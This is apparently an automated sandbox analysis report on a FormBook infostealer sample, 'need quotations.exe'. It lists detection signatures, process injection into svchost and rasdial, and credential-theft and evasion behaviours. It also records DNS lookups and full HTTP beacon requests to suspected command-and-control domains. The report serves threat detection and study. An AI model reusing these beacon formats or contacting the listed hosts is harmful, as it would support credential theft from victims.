Edit tour

Windows Analysis Report
need quotations.exe

Overview

General Information

Sample name:	need quotations.exe
Analysis ID:	1559030
MD5:	2b4391106cb993ad3fa94fff2d39c70c
SHA1:	cc46179bcd3b71e6ee6a08d64cb2c1110cb08535
SHA256:	45a9ab6797cc7d6ea37308be07621d172f52d59d82ab5bb10adba5ca4c598a46
Tags:	exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious RASdial Activity

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

need quotations.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\need quotations.exe" MD5: 2B4391106CB993AD3FA94FFF2D39C70C)

svchost.exe (PID: 6928 cmdline: "C:\Users\user\Desktop\need quotations.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

hyAHqPRvnfCBI.exe (PID: 5940 cmdline: "C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

rasdial.exe (PID: 3300 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)

firefox.exe (PID: 6236 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.4145847136.0000000006A40000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4142028944.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4141916855.00000000032E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1982709060.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1982943368.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4140969114.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1983616286.0000000003950000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4142229075.0000000002950000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious RASdial Activity

Source: Process started

Author: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe" , ParentImage: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe, ParentProcessId: 5940, ParentProcessName: hyAHqPRvnfCBI.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 3300, ProcessName: rasdial.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\need quotations.exe", CommandLine: "C:\Users\user\Desktop\need quotations.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\need quotations.exe", ParentImage: C:\Users\user\Desktop\need quotations.exe, ParentProcessId: 6880, ParentProcessName: need quotations.exe, ProcessCommandLine: "C:\Users\user\Desktop\need quotations.exe", ProcessId: 6928, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\need quotations.exe", CommandLine: "C:\Users\user\Desktop\need quotations.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\need quotations.exe", ParentImage: C:\Users\user\Desktop\need quotations.exe, ParentProcessId: 6880, ParentProcessName: need quotations.exe, ProcessCommandLine: "C:\Users\user\Desktop\need quotations.exe", ProcessId: 6928, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: need quotations.exe	ReversingLabs: Detection: 34%
Source: need quotations.exe	Virustotal: Detection: 28%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4145847136.0000000006A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4142028944.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4141916855.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1982709060.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1982943368.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4140969114.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1983616286.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4142229075.0000000002950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: need quotations.exe

Joe Sandbox ML: detected

Source: need quotations.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hyAHqPRvnfCBI.exe, 00000005.00000002.4141616808.0000000000C1E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: need quotations.exe, 00000000.00000003.1682034969.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, need quotations.exe, 00000000.00000003.1681755557.0000000004120000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890783925.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1983157334.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1888736048.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1983157334.0000000003600000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142260189.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1982993725.0000000004AE4000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1988430083.0000000004C9D000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142260189.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rasdial.pdb source: svchost.exe, 00000001.00000002.1983013485.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1950582197.0000000003014000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: need quotations.exe, 00000000.00000003.1682034969.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, need quotations.exe, 00000000.00000003.1681755557.0000000004120000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1890783925.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1983157334.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1888736048.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1983157334.0000000003600000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142260189.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1982993725.0000000004AE4000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1988430083.0000000004C9D000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142260189.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000002.1983013485.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1950582197.0000000003014000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.000000000460C000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.000000000547C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4141193170.000000000304A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2273790908.000000003765C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.000000000460C000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.000000000547C000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4141193170.000000000304A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2273790908.000000003765C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00286CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00286CA9
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_002860DD
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_002863F9
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0028EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0028EB60
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0028F56F FindFirstFileW,FindClose,	0_2_0028F56F
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0028F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0028F5FA
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00291B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00291B2F
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00291C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00291C8A
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00291F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00291F94

Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 4x nop then xor eax, eax		5_2_06A5DB75
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Code function: 4x nop then pop edi		5_2_06A5A34F

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.egldfi.xyz
Source:	DNS query: www.trendave.xyz
Source:	DNS query: www.soainsaat.xyz

Source: Joe Sandbox View	IP Address: 130.185.109.77 130.185.109.77
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_00294EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00294EB5

Source: global traffic	HTTP traffic detected: GET /vl4d/?xDq=QHNq3VljPHXHL8Z+m/91IyVktX2l1Liqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym2iV1w40c0QsDnhpOyo2cx9iWMgjuEVKoVLw=&Lhx=fPAh7htHyFPl- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.75178.clubUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /5onp/?xDq=YQtAzQFhELh+NSSrGqCNnhce8BNGqUHm8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+UQeEteLMn8uXkqbvRDHjk1GU4HyortJJJ3Q=&Lhx=fPAh7htHyFPl- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bcg.servicesUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /3e55/?xDq=e7cut+sq+gjH7SJUS4xdyYo0p6mJ9qAA0wzN+9ruW+EOQxiCPnXfmi7SN89EF+kZU43+kk4LMIz3TDJAmTe52w+EUUdZ4J96HyImgVvdykY8ajmm995qykg=&Lhx=fPAh7htHyFPl- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.egldfi.xyzUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /bnd1/?xDq=+qUIBb8n1ABDtnrHN8NtG8V6LcaZfiG0FDsVLWxlL8URstOMchGUJI+QLzGyTcFWCZ2pjKgvok0jKnOQP4P3BCUAJ4DrLeDFBH9H9m1GLjfoWl8bX0C0KxM=&Lhx=fPAh7htHyFPl- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.betmatchx.onlineUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /bsyy/?Lhx=fPAh7htHyFPl-&xDq=w9Wsyrfddra1GxcX7luKIP81eOoQqUt/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVtzbO2HWO/vlwyzXb4OCTu0u4SZtJF3c1HS4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /cv1w/?xDq=KIRaABhBgujzn3KVjNCYdeU2jI4CiDZHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDesRP/SoiJcG7UzeyTKHH5ghDsthQpYxENiFA=&Lhx=fPAh7htHyFPl- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.lgdiamonds.infoUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /lvda/?Lhx=fPAh7htHyFPl-&xDq=ELDSXX2RsHX+gMhA2PfNyBEKowNIoqU7uMJ0P3epR9C3wBGcH3Oc/iCy84j3rr0M4JJUpyIPXVKNA8OpCuWYmMQdGJQpdXCyyNvs5R5nS90nKpkFpzjMZ1A= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jalan2.onlineUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /nhcb/?xDq=Jt/EBXmNn0Xont3Uq3SrNJmrJY3M4cpFu0H2rr3BW2spn453uaHrewE12DuyPcurf4Mzbuz0WqMTaNbmObgJIgyyiHGSgJZQh0vowHWBwbWi8nXeO4OBSJo=&Lhx=fPAh7htHyFPl- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.trendave.xyzUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /1mwk/?Lhx=fPAh7htHyFPl-&xDq=aP/gzvnIJweJBGAM8k6pu85FwARGRrJi7lENLyBMprrjHPxpI72KmSEUutQfwM36acX1gmYQGU/DOh8WpWJogojdJuslZQVWDuA2Yws6YeX4RtAi+znuQho= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.nb-shenshi.buzzUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /3g99/?xDq=RytNeZ1XRv60mT66OsZ14/Z53Dl0UWWckwx6IFoxcwMb7EGpIrhq/2Ikbe8axKxY7FzhI3ANlUXRki/bAaSaeyuYJYNKRROQR84NXiU2Qicm7Q5G8aT8zzM=&Lhx=fPAh7htHyFPl- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rysanekbeton.cloudUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /0xli/?xDq=fiwXgneLShVjQCrL4aAUmgr67nbTTs+FPQo9HslC8d9LCicIVxdgVPkWu4N9YPZNTEC7g2Z77mR61ZpsKE291b6+nh6+OhPQfROIutba2cindDDWBeD84Ws=&Lhx=fPAh7htHyFPl- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rafconstrutora.onlineUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /qn33/?xDq=99NzBUOu8EtmiwHLkwkwM6CtLEWWEZ390ZejPygVUj3ypAzbuWBUlAjLLmpNciJuv0EF7eUmh88cLf0Gn8IRd668KNerATnE+FhfiYpUJ+CuKGzT26uc/xk=&Lhx=fPAh7htHyFPl- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.127358.winUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /mjdo/?Lhx=fPAh7htHyFPl-&xDq=6ADCnvQ9skB547dZOlACxZFhOrPxqdgjeRNtw+K9MfX5BFQo5QxZgNYKE+M2PfHWzU0KXpv/hGs7jgBNQBXtV5EjFabqUTy5wuEB7uMwsxBP1BSM4RINEQo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.prototype.gardenUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /jmkz/?xDq=2/h6on3i5cEqQ5is+ICgXmY2AkJVcLKq2EbSJtEbgpp6+wmMOVJuzUCOWh5aW8O1XJ0bOuSOAqNryZfPUVNa+soYNjAnpoeEkPK1vyRK5nou96mjQ4WwK9s=&Lhx=fPAh7htHyFPl- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rtpwslot888gol.sbsUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /gqm1/?xDq=VH76hcmRMgeprQ8IT+3GxX+TS5+dQO04AZO3l+okmzs3WMxErCusHenX7YpJhZ4NLCcONUUw+VEfVDncTohff+sgqvxsooslXq9NnGhH6p7WeG8ES6Jz9FQ=&Lhx=fPAh7htHyFPl- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.soainsaat.xyzUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
